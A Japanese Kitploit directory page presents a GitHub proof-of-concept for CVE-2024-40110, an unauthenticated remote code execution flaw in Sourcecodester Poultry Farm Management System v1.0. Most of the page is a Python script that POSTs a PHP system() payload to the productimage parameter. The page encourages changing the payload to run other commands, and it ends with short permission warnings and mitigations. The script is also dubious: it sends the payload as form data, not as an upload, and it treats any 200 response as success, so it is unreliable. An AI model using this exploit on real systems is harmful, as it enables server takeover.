Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-40110 — Sourcecodester Poultry Farm Management Systemの脆弱なproductimageパラメータを介した認証なしリモートコード実行を実証する概念実証スクリプト。 | Kitploit
ツール/GitHubGitHub/abdurahmon3236/cve-2024-40110
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

Sourcecodester Poultry Farm Management Systemの脆弱なproductimageパラメータを介した認証なしリモートコード実行を実証する概念実証スクリプト。

リポジトリを見る
152年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Sourcecodester Poultry Farm Management System v1.0 における未認証リモートコード実行の概念実証 (PoC)

このリポジトリには、Sourcecodester Poultry Farm Management System v1.0 における未認証リモートコード実行 (RCE) の脆弱性を実証する概念実証 (PoC) スクリプトが含まれています。脆弱性は /farm/product.php の productimage パラメータに存在し、攻撃者がサーバー上で任意のコードを実行することを可能にします。

目次

  • 脆弱性の説明
  • セットアップと使用方法
    • PoC スクリプト
  • 重要な考慮事項
  • 緩和策

脆弱性の説明

CVE-ID: (未定)

概要: Sourcecodester Poultry Farm Management System v1.0 には、/farm/product.php の productimage パラメータを介した未認証リモートコード実行 (RCE) の脆弱性が存在します。この脆弱性により、攻撃者は認証なしでサーバー上で任意のコードを実行できます。

影響を受けるバージョン:

  • Sourcecodester Poultry Farm Management System v1.0

セットアップと使用方法

前提条件

  • Python 3.x
  • requests ライブラリ (pip install requests)

PoC スクリプト

このスクリプトは、攻撃者が脆弱なパラメータに悪意のあるリクエストを送信することで RCE 脆弱性を悪用する方法を示しています。

以下のスクリプトを rce_poc.py として保存し、実行します。

import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)

説明

  1. 設定: target_url を脆弱なサーバーの /farm/product.php エンドポイントの URL に設定します。
  2. ペイロード: ペイロードはシンプルな PHP コマンド実行ペイロードです。必要に応じてペイロードを変更し、異なるコマンドを実行できます。
  3. リクエストの構築: スクリプトは、productimage パラメータに悪意のあるペイロードを含む POST リクエストを構築します。
  4. 悪用関数: exploit_rce() 関数は、ターゲット URL に悪意のあるリクエストを送信し、レスポンスの詳細を出力します。
  5. スクリプトの実行: 実行されると、スクリプトは RCE 脆弱性の悪用を試み、結果を出力します。

重要な考慮事項

  • 許可: 対象システムでこの脆弱性をテストする前に、明示的な許可を得ていることを確認してください。無許可のテストは違法であり、非倫理的です。
  • テスト環境: 本番システムに影響を与えないよう、管理された環境でテストを実施してください。
  • ペイロードのカスタマイズ: 目的のコマンド実行を達成するために、必要に応じてペイロードをカスタマイズしてください。

緩和策

この脆弱性を緩和するには、以下の手順を適用してください。

  • 入力検証: ユーザー入力をサニタイズするために、適切な入力検証を実装します。
  • ファイルアップロード制限: 特定のファイルタイプのみを許可し、サイズ制限を enforced するようにファイルアップロードを制限します。
  • ソフトウェアの更新: セキュリティパッチと修正を適用するために、ソフトウェアを常に最新バージョンに更新します。

これらの緩和策とセキュリティのベストプラクティスに従うことで、Sourcecodester Poultry Farm Management System v1.0 におけるこの RCE 問題のような脆弱性を防止できます。

ツールをダウンロード